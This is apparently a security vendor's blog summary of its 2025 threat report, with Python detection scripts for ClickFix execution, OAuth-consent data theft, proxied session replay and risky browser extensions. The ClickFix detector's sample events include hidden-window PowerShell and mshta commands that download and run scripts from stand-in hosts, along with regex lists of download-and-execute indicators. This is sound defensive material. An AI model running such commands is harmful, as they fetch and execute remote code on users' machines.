2025 Cyber Threats: A Frontline Perspective

Philip Roberts | 11 February 2026

Introduction

Fortian is pleased to present its annual Security Operations Centre report, outlining the most material cyber threat trends affecting Australian organisations throughout 2025. This report draws on incidents detected, investigated, and mitigated by Fortian’s SOC over the past year.

The findings reflect real-world attacker behaviour observed across our customer base, rather than theoretical or headline-driven threats. They are set within the context of broader shifts in enterprise technology, including widespread cloud migration, accelerating SaaS adoption, the move toward identity-centric security models, and the increasing operational use of AI across business environments.

Most importantly, the report identifies practical defensive measures that Australian organisations can implement to reduce exposure, strengthen detection, and better align security controls with the realities of modern enterprise architecture.

This article summarises the key observations and themes from the full report. The complete report includes deeper technical analysis, additional case examples, and more detailed defensive guidance, and is available on request directly from Fortian.

Overview

Across all campaigns observed in 2025, Fortian identified a clear departure from traditional perimeter-focused intrusion toward attacks that exploit identity, SaaS platforms, browsers, and other technologies that now sit at the core of modern business operations. As organisations continued to dissolve the network perimeter through Zero Trust architectures and distributed cloud services, threat actors adjusted accordingly, shifting their focus to the identity plane and to platforms that aggregate access to high-value data but are often inconsistently governed.

Across 2025, Fortian observed four dominant and interconnected threat trends:

  1. The resurgence of infostealer-driven identity compromise
  2. Large-scale data theft via poorly governed SaaS platforms
  3. Widespread defence evasion through residential IP proxying and abuse of trusted infrastructure, and
  4. The emergence of browser-native attacks that operate entirely outside traditional endpoint controls.

1. Infostealer Malware

Infostealer malware emerged as the dominant enabler of modern attack chains, reflecting a broader move toward scalable, low-friction identity compromise rather than destructive outcomes.

These campaigns prioritised the theft of credentials and session tokens, enabling delayed compromise, resale of access, and follow-on attacks months after initial infection.

Infection vectors shifted away from email-based phishing toward web-delivered lures: instruction-driven execution techniques such as ClickFix (in which the victim is coaxed into pasting and running a command themselves, so that no exploit or attachment is needed), SEO poisoning, and malicious content hosted on trusted platforms.

This mirrors a wider trend in which attackers exploit user trust in browsers, cloud services, and developer platforms, rather than attempting to bypass hardened operating systems or email gateways.
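
As an added illustration (not part of Fortian's report), the following Python detection logic flags the ClickFix execution pattern described above: a script host such as powershell.exe or mshta.exe launched from an interactive parent (explorer.exe for the Win+R Run dialog, or a browser) with a command line that both fetches remote content and conceals or evaluates it. The events, user names, paths and hostnames are constructed for this example; the field names follow Sysmon Event ID 1.

```python
import re

# Constructed process-creation events for this example (field names follow Sysmon Event ID 1).
# Hostnames use the reserved .invalid TLD; users and paths are invented.
SAMPLE_EVENTS = [
    {"id": 1, "User": "CORP\\alice", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "irm https://cdn.example.invalid/fix.ps1 | iex"'},
    {"id": 2, "User": "CORP\\bob", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://verify.example.invalid/captcha.hta"},
    {"id": 3, "User": "CORP\\carol", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Process | Sort-Object CPU"},
    {"id": 4, "User": "NT AUTHORITY\\SYSTEM", "ParentImage": r"C:\Program Files\Corp\Agent\agent.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Corp\inventory.ps1"},
]

# ClickFix asks the victim to paste a command into the Run dialog (parent explorer.exe) or a
# terminal opened from the browser, so the rule is scoped to those interactive parents.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "windowsterminal.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line indicators split into "fetches something remote" and "runs or hides it".
INDICATORS = {
    "remote_fetch": re.compile(
        r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile|curl|certutil)\b", re.I),
    "inline_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "encoded_cmd": re.compile(r"(^|\s)-(e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_window": re.compile(r"-(w|win|windowstyle)\s+hidden\b", re.I),
    "policy_bypass": re.compile(r"-(ep|executionpolicy)\s+bypass\b", re.I),
    "url_argument": re.compile(r"https?://\S+", re.I),
}
FETCH = {"remote_fetch", "url_argument"}
CONCEAL_OR_EXEC = {"inline_exec", "encoded_cmd", "hidden_window", "policy_bypass"}


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event):
    """Return the sorted indicator names if the event matches the ClickFix pattern, else None."""
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    if image not in SCRIPT_HOSTS or parent not in INTERACTIVE_PARENTS:
        return None
    hits = {name for name, rx in INDICATORS.items() if rx.search(event["CommandLine"])}
    # Require a remote fetch plus either concealment/evaluation, or mshta (which runs what it fetches).
    if hits & FETCH and (hits & CONCEAL_OR_EXEC or image == "mshta.exe"):
        return sorted(hits)
    return None


def detect_clickfix(events):
    """Run classify() over a batch of events and return the findings in input order."""
    findings = []
    for event in events:
        hits = classify(event)
        if hits:
            findings.append({"id": event["id"], "user": event["User"],
                             "host": basename(event["Image"]), "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in detect_clickfix(SAMPLE_EVENTS):
        print(finding)
```

Scoping the rule to interactive parents keeps scheduled tasks and management agents (event 4) out of the alert queue; those are better covered by script-block logging. A Win+R launch also records the pasted command under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so that key is worth collecting when triaging a hit.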

2. Data theft via SaaS Platforms

Fortian also observed a marked increase in data theft via Software as a Service platforms, particularly where these platforms operate outside centralised identity governance and security monitoring.

Salesforce emerged as a primary target in 2025, with threat actors leveraging helpdesk vishing and OAuth consent abuse (persuading a user or helpdesk operator to authorise an attacker-controlled connected application) to achieve rapid, tenant-level access and high-volume data exfiltration.

These campaigns did not rely on software vulnerabilities, but instead exploited organisational process gaps, fragmented identity models, and the absence of consistent entitlement management across SaaS environments.

The speed and scale of these compromises highlight how cloud platforms can compress attack timelines when governance and detection controls lag behind adoption.
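
As an added example, not drawn from the report, the script below correlates an OAuth consent grant with the API volume that follows it, which is the sequence the Salesforce campaigns above relied on. The event shape, app names, users and row counts are constructed for this example; the scope names are the ones Salesforce uses. A broad-scope consent granted to an unsanctioned app is reported on its own, and is escalated when the same app reads more than a threshold number of records within the window.

```python
from datetime import datetime, timedelta

# Constructed events for this example, in a vendor-neutral shape: a "consent" record for a
# connected-app authorisation and an "api_read" record per bulk query. Apps, users and row
# counts are invented; the scope names are the ones Salesforce uses.
EVENTS = [
    {"type": "consent", "ts": "2025-06-03T09:00:00", "user": "alice", "app": "Ticket Helper",
     "scopes": ["full", "refresh_token", "api"]},
    {"type": "api_read", "ts": "2025-06-03T09:05:00", "user": "alice", "app": "Ticket Helper",
     "object": "Account", "rows": 50_000},
    {"type": "api_read", "ts": "2025-06-03T09:20:00", "user": "alice", "app": "Ticket Helper",
     "object": "Contact", "rows": 120_000},
    {"type": "api_read", "ts": "2025-06-03T09:40:00", "user": "alice", "app": "Ticket Helper",
     "object": "Opportunity", "rows": 30_000},
    {"type": "consent", "ts": "2025-06-03T10:00:00", "user": "bob", "app": "Corp Reporting",
     "scopes": ["api", "refresh_token"]},
    {"type": "api_read", "ts": "2025-06-03T10:30:00", "user": "bob", "app": "Corp Reporting",
     "object": "Opportunity", "rows": 250_000},
    {"type": "consent", "ts": "2025-06-03T11:00:00", "user": "carol", "app": "Calendar Sync",
     "scopes": ["openid", "email"]},
    {"type": "api_read", "ts": "2025-06-03T11:02:00", "user": "carol", "app": "Calendar Sync",
     "object": "Event", "rows": 12},
    {"type": "consent", "ts": "2025-06-03T12:00:00", "user": "dave", "app": "Lead Enricher",
     "scopes": ["api"]},
]

SANCTIONED_APPS = {"Corp Reporting"}                     # connected apps approved through change control
BROAD_SCOPES = {"full", "api", "refresh_token", "web"}   # scopes that give tenant-wide, durable access
ROW_THRESHOLD = 100_000                                  # records read within WINDOW that count as bulk exfiltration
WINDOW = timedelta(hours=2)


def is_risky_consent(event):
    """A consent is risky when an unsanctioned app is granted any broad scope."""
    return (event["type"] == "consent"
            and event["app"] not in SANCTIONED_APPS
            and bool(set(event["scopes"]) & BROAD_SCOPES))


def correlate(events):
    """For each risky consent, total the rows the same app read during the following window."""
    alerts = []
    for consent in (e for e in events if is_risky_consent(e)):
        start = datetime.fromisoformat(consent["ts"])
        end = start + WINDOW
        reads = [e for e in events
                 if e["type"] == "api_read" and e["app"] == consent["app"]
                 and start <= datetime.fromisoformat(e["ts"]) <= end]
        rows = sum(e["rows"] for e in reads)
        alerts.append({
            "app": consent["app"],
            "granted_by": consent["user"],
            "broad_scopes": sorted(set(consent["scopes"]) & BROAD_SCOPES),
            "rows_read": rows,
            "objects": sorted({e["object"] for e in reads}),
            # A broad consent alone is worth a review; consent followed by bulk reads is an incident.
            "severity": "high" if rows >= ROW_THRESHOLD else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert)
```

The sanctioned-app list is what makes the rule usable: the same volume from an approved reporting integration is normal, so the detection is really a test of whether connected-app approval and entitlement review are happening at all.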

3. Defence Evasion

Defence evasion was a defining feature of threat activity in 2025.

Threat actors across all levels of sophistication adopted residential IP proxy networks and abused legitimate cloud and line-of-business platforms for phishing, malware delivery, and command-and-control.

These techniques allowed malicious activity to blend into normal consumer and enterprise traffic, significantly reducing the effectiveness of IP reputation, geofencing, and static indicators.

Fortian’s observations reinforce a broader industry shift away from network-centric controls toward behavioural, identity-aware detection strategies that operate across users, devices, and applications.
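
To make the shift from network-centric to behavioural detection concrete, here is an added example (not from the report) that runs the same constructed sign-in events through both kinds of rule. The IP-reputation rule passes a stolen session token replayed through an Australian residential proxy, because geography and IP category look normal; the behavioural rule flags it because the session was first issued to a different device, the presenting device is unrecognised and has not completed MFA, and the hour is far outside the user's baseline. Field names, users, devices and session identifiers are assumptions of this example.

```python
from datetime import datetime

# Constructed sign-in records for this example. The fields are the ones most identity providers
# expose: an IP classification, a device identifier or fingerprint, the session identifier the
# sign-in presents, and whether MFA was completed. Users, devices and sessions are invented.
HISTORY = [
    {"user": "alice", "ts": f"2025-08-{day:02d}T{hour:02d}:00:00", "country": "AU",
     "ip_category": "corporate", "device_id": "D-ALICE-01", "session_id": "S-7f3a", "mfa": True}
    for day, hour in [(1, 9), (2, 10), (3, 11), (4, 14), (5, 16)]
]
CANDIDATES = [
    # A session cookie taken by an infostealer and replayed from the attacker's browser, exiting
    # through an Australian residential proxy: geography and IP category look normal.
    {"user": "alice", "ts": "2025-08-06T03:00:00", "country": "AU", "ip_category": "residential",
     "device_id": "D-UNKNOWN-7", "session_id": "S-7f3a", "mfa": False},
    # The user's own device, usual hours, same session.
    {"user": "alice", "ts": "2025-08-06T10:00:00", "country": "AU", "ip_category": "corporate",
     "device_id": "D-ALICE-01", "session_id": "S-7f3a", "mfa": False},
]


def ip_reputation_rule(signin, allowed_countries=("AU",), bad_categories=("datacenter", "anonymizer")):
    """The network-centric check: flags only on geography or a bad IP category."""
    return signin["country"] not in allowed_countries or signin["ip_category"] in bad_categories


def build_baseline(history):
    """Per user: devices seen, the device each session was first issued to, and usual hours."""
    baseline = {}
    for s in history:
        b = baseline.setdefault(s["user"], {"devices": set(), "session_device": {}, "hours": set()})
        b["devices"].add(s["device_id"])
        b["session_device"].setdefault(s["session_id"], s["device_id"])
        b["hours"].add(datetime.fromisoformat(s["ts"]).hour)
    return baseline


def behavioural_rule(signin, baseline):
    """Identity-aware check: returns the reasons the sign-in deviates from the user's baseline."""
    b = baseline.get(signin["user"])
    if b is None:
        return ["no behavioural baseline for this user"]
    reasons = []
    bound = b["session_device"].get(signin["session_id"])
    if bound is not None and bound != signin["device_id"]:
        reasons.append(f"session token issued to {bound} presented by {signin['device_id']}")
    if signin["device_id"] not in b["devices"] and not signin["mfa"]:
        reasons.append("unrecognised device without fresh MFA")
    hour = datetime.fromisoformat(signin["ts"]).hour
    if min(abs(hour - h) for h in b["hours"]) > 2:
        reasons.append(f"sign-in at {hour:02d}:00 is outside the user's usual hours")
    return reasons


def evaluate(signins, baseline):
    """Run both rules side by side so the difference in coverage is visible."""
    return [{"user": s["user"], "ts": s["ts"],
             "ip_reputation_flag": ip_reputation_rule(s),
             "behavioural_reasons": behavioural_rule(s, baseline)} for s in signins]


if __name__ == "__main__":
    for verdict in evaluate(CANDIDATES, build_baseline(HISTORY)):
        print(verdict)
```

The session-to-device binding is the detail that matters against infostealers: a token stolen from an infected endpoint is still valid, so the only observable is that it is now being presented from somewhere it was never issued to. Identity providers that bind tokens to device compliance state remove the need to infer this after the fact.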

4. Living-off-the-Browser Attacks

A further evolution observed in 2025 was the emergence of Living-off-the-Browser attacks, where malicious browser and IDE extensions abuse native application functionality to perform credential theft and data exfiltration without deploying traditional malware.

This reflects a structural blind spot in many organisations, where endpoints are heavily hardened but the browser remains largely ungoverned despite functioning as the primary interface to SaaS, identity providers, financial services, and AI tools.

As browsers increasingly act as the execution environment for sensitive workflows, they have become a high-value target for threat actors seeking to avoid operating system-level detection entirely.
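
As an added example that is not part of the report, the following script scores browser extension manifests by the capabilities the section describes (cookie access, request interception, script injection into every page) and turns the result into a default-deny ExtensionSettings policy of the kind Chrome and Edge accept. The three manifests, their IDs, the sanctioned list and the weights are constructed for this example.

```python
import json

# Constructed manifests for this example; the extension names and 32-character IDs are invented.
# Manifest V3 declares host patterns in "host_permissions"; Manifest V2 mixed them into
# "permissions", so both places are read.
MANIFESTS = {
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": {
        "name": "Page Helper Pro", "manifest_version": 3,
        "permissions": ["cookies", "webRequest", "scripting", "tabs"],
        "host_permissions": ["<all_urls>"],
        "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"]}]},
    "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb": {
        "name": "Corp Password Vault", "manifest_version": 3,
        "permissions": ["tabs", "scripting", "nativeMessaging"],
        "host_permissions": ["https://*/*", "http://*/*"],
        "content_scripts": [{"matches": ["https://*/*"], "js": ["fill.js"]}]},
    "cccccccccccccccccccccccccccccccc": {
        "name": "Tab Counter", "manifest_version": 3,
        "permissions": ["tabs"]},
}
SANCTIONED_IDS = {"bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"}   # approved through change control

# Weights are judgment calls for this example: APIs that read session material or intercept
# traffic score highest; APIs that only observe tab metadata score lowest.
API_WEIGHTS = {"debugger": 5, "cookies": 4, "nativeMessaging": 4, "proxy": 4,
               "webRequest": 3, "webRequestBlocking": 3, "clipboardRead": 3, "management": 3,
               "scripting": 2, "history": 2, "declarativeNetRequest": 2,
               "webNavigation": 1, "tabs": 1}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def is_host_pattern(entry):
    return entry == "<all_urls>" or "://" in entry


def score_manifest(manifest):
    """Return (score, reasons, api_permissions) for one manifest."""
    declared = manifest.get("permissions", [])
    apis = [p for p in declared if not is_host_pattern(p)]
    hosts = [p for p in declared if is_host_pattern(p)] + manifest.get("host_permissions", [])
    injected = [m for cs in manifest.get("content_scripts", []) for m in cs.get("matches", [])]
    score = sum(API_WEIGHTS.get(a, 0) for a in apis)
    reasons = [a for a in apis if API_WEIGHTS.get(a, 0) >= 3]
    if BROAD_HOSTS & set(hosts):
        score += 5
        reasons.append("host access to all sites")
    elif hosts:
        score += min(len(hosts), 3)
    if BROAD_HOSTS & set(injected):
        score += 3
        reasons.append("content script injected into every page")
    return score, reasons, apis


def tier(score):
    return "high" if score >= 10 else "medium" if score >= 5 else "low"


def assess(manifests, sanctioned):
    """Score every manifest and decide an action; sanctioned IDs are reported but allowed."""
    findings = []
    for ext_id, manifest in manifests.items():
        score, reasons, apis = score_manifest(manifest)
        if ext_id in sanctioned:
            action = "allow"
        else:
            action = "block" if tier(score) == "high" else "review"
        findings.append({"id": ext_id, "name": manifest["name"], "score": score, "tier": tier(score),
                         "reasons": reasons, "apis": apis, "sanctioned": ext_id in sanctioned,
                         "action": action})
    return sorted(findings, key=lambda f: -f["score"])


def extension_settings_policy(findings, blocked_apis=("debugger", "nativeMessaging", "proxy")):
    """Build a default-deny ExtensionSettings policy (key names are Chrome's): every extension is
    blocked unless listed, and the riskiest APIs stay blocked even for listed extensions unless a
    sanctioned extension declares that it needs them."""
    policy = {"*": {"installation_mode": "blocked", "blocked_permissions": list(blocked_apis)}}
    for f in findings:
        if f["sanctioned"]:
            entry = {"installation_mode": "allowed"}
            needed = [a for a in f["apis"] if a in blocked_apis]
            if needed:
                entry["allowed_permissions"] = needed
            policy[f["id"]] = entry
    return policy


if __name__ == "__main__":
    results = assess(MANIFESTS, SANCTIONED_IDS)
    for f in results:
        print(f"{f['name']:<22} score={f['score']:<3} tier={f['tier']:<7} action={f['action']}")
    print(json.dumps(extension_settings_policy(results), indent=2))
```

The sanctioned vault scores as high as the malicious helper, which is the point: permission scoring finds what needs governance, it does not decide what is malicious, so the allowlist has to come from a reviewed inventory rather than from the score. IDE extensions use different manifests and permission models, so the weight table would change, but the inventory-then-allowlist flow is the same.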

A Note About AI

While no single campaign observed by Fortian relied exclusively on AI, its influence was evident across multiple threat classes.

AI lowered barriers for threat actors by enabling more convincing phishing and vishing lures, accelerating malware development, and increasing the operational velocity of campaigns.

At the same time, enterprise adoption of AI and emerging agentic systems expanded the attack surface, introducing new identity types, new trust relationships, and new governance challenges that are not yet well addressed by existing security models.

Defensive Imperatives (Key takeaways)

The findings in this report point to two enduring strategic defensive imperatives for organisations entering 2026.

  1. Securing the identity layer: Looking into 2026, strengthening controls across the entire identity stack should be a core security mandate for organisations. Every major threat trend observed by our Security Operations Centre over the past year incorporated identity compromise, either as the primary objective or as a prerequisite for post-exploitation activity. Organisations must therefore take a holistic view of identity, including who is accessing the environment, how that access is authenticated and brokered, and which systems, applications, and data those identities can reach. With this visibility, organisations can apply consistent and proportionate security controls across the entire user base. Achieving this requires centralised identity governance and lifecycle management through a single primary identity provider that federates access to all resources, both on-premises and SaaS. Access can then be further strengthened through enforced device compliance and phishing-resistant multi-factor authentication, providing organisations with greater assurance and control over how identities interact with critical systems and data.
  2. Eliminating shadow IT and enforcing consistent governance: Campaigns observed in 2025 demonstrated that threat actors have a clear understanding of where enterprise environments lack robust governance, security controls, and monitoring. These gaps, particularly in SaaS platforms and user-facing technologies, enabled attackers to bypass traditional security controls and obtain near-unrestricted access to high-value data stores. This risk is further amplified by the rapid adoption of AI, including the deployment of unsanctioned AI tools, models, and autonomous agents, as well as the uncontrolled upload of sensitive data to external AI services. Entering 2026, organisations should prioritise identifying, inventorying, and governing all technologies that provide access to, or store, large volumes of data, with particular focus on SaaS applications and web browsers, which increasingly act as the primary brokers for identity, access, and data movement.

Taken together, these findings underscore the need for organisations to realign security strategy with the realities of modern enterprise architecture, prioritising identity, governance, and behavioural detection to remain resilient against evolving threats.

As stated previously, this article summarises the key observations and themes from the full report. The complete report includes deeper technical analysis, additional case examples, and more detailed defensive guidance, and is available on request directly from Fortian.
